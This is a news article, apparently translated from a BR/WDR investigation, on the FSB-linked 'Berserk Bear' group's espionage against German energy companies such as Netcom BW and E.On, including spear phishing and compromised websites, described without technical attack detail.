For years, German authorities have been warning of a hacker group that is specifically spying on the power grid. Investigators managed to identify a suspected perpetrator. The trail leads to the Russian secret service FSB.
It was a wide-ranging espionage operation in which more than 150 companies were to be hacked in Germany alone – especially in the area of so-called critical infrastructure. Specifically, the hackers wanted to scout out the electricity and water supply. According to information from BR and WDR After years of investigation, the State Criminal Police Office of Baden-Württemberg succeeded in identifying one of the suspected perpetrators.
Pawel A. is said to belong to a hacker group that IT security companies call “Berserk Bear” or “Dragonfly”. The US Department of Justice assumes that the hackers work for the Russian secret service FSB, more precisely for the “Center 16” department, which is based in Moscow. According to the indictment by the US Department of Justice, the hackers are intended to enable the Russian government to “interrupt and damage important power generation facilities if desired”.
Non-public arrest warrant
Pawel A. is held responsible for hacking the network of Netcom BW in the summer of 2017. In September 2021, more than four years later, the Attorney General in Karlsruhe obtained an arrest warrant. To this day it is not public. Netcom BW belongs to the EnBW power group and takes care of the fiber optic expansion as well as routing important internal data for EnBW about the power supply via a specially secured network.
The hackers managed to access the Internet traffic via a vulnerability in the routers from Netcom BW. It would have been possible to manipulate this.
On request, EnBW stated that the hackers had previously hacked an external service provider. “Its infrastructure was compromised as a result.” The hackers then gained access to the management system of Netcom BW’s public telecommunications network via a maintenance access.
“The EnBW electricity and gas network control was never affected, as this is managed in a separate, specially secured network,” says the company. Since the attack, Netcom BW has been regularly checked and certified by independent bodies, and EnBW has “expanded its cyber defense capabilities”. EnBW welcomes the fact that the investigations were successful: “If there should be a conviction, we would of course be very interested in finding out something about the motivation and goals of the attacker.”
E.On also in sight
Reporters from BR and WDR based on previously unknown cases. For example, the hackers were also targeting the electricity company E.On. To do this, they had prepared a 35-page document that appeared to be an internal document from a consulting firm. The document that BR and WDR is available, is entitled: “Assessment of the long-term investment needs of the decentralized E.On power grids”. As soon as a user opens the document, an unnoticed attempt is made to send their login data to a server that the hackers control. The hackers could use this to log into other services that this user uses, for example the e-mail inbox. IT security experts speak of spear phishing.
When asked, E.On declined to comment. The consulting firm confirms that there was “an attack on a holding company” in the summer of 2017. The company did not want to answer whether the document originally came from this company.
BND Vice: Access to the network procured early
Since the outbreak of the Russian war against Ukraine, German security authorities have been warning of cyber attacks on the power grid. At a conference at the end of June, Wolfgang Wien, Vice President of the Federal Intelligence Service, said: “We must be aware that Russia is in our networks.” Such access to the network would be procured at an early stage. “Let’s assume that’s prepared,” said Wien. “Berserk Bear” is considered among experts as a group whose task it is to procure such access.
In December 2015, hackers carried out an extensive attack on the power supply in Ukraine. The IT systems of several substations were infected with malware called “Black Energy” and shut down. More than 200,000 people were affected, and the power went out for up to six hours. The group “Sandworm” is held responsible for the attack. According to European security authorities, it is assigned to another Russian secret service, the GRU.
Gabby Roncone works as an IT security expert at Mandiant and has been observing the “Berserk Bear” group for years: “One of our biggest concerns is that the hackers will be able to permanently establish themselves in the compromised networks and later gain this access if the time has come to use it for destructive attacks.” Roncone emphasizes that there is currently no evidence of this. She points out that the hackers are currently primarily spying on office networks and not industrial plants. This would require completely new tools and in-depth expertise.
Activities monitored by the Office for the Protection of the Constitution
It is unclear how many corporate networks the hackers from “Berserk Bear” were able to penetrate. Only companies that belong to the critical infrastructures have to report such incidents. The Federal Office for the Protection of the Constitution managed to monitor at least part of the incoming and outgoing Internet traffic of the hackers. Because one of the servers that the hackers used was in Germany.
In addition to phishing attacks, the hackers from “Berserk Bear” also hacked into strategically relevant websites and subtly rebuilt them in order to steal confidential information, especially login data. This affected both the website of a company that designs websites for energy suppliers and the website of a company that offers software in this area. The calculation of the hackers: Many website visitors of these specialized companies are likely to be active in the area of critical infrastructures and therefore interesting targets for espionage. Both companies were apparently unaware that their sites had been hacked. The Attorney General has not commented on the investigation. The Russian embassy left a request unanswered.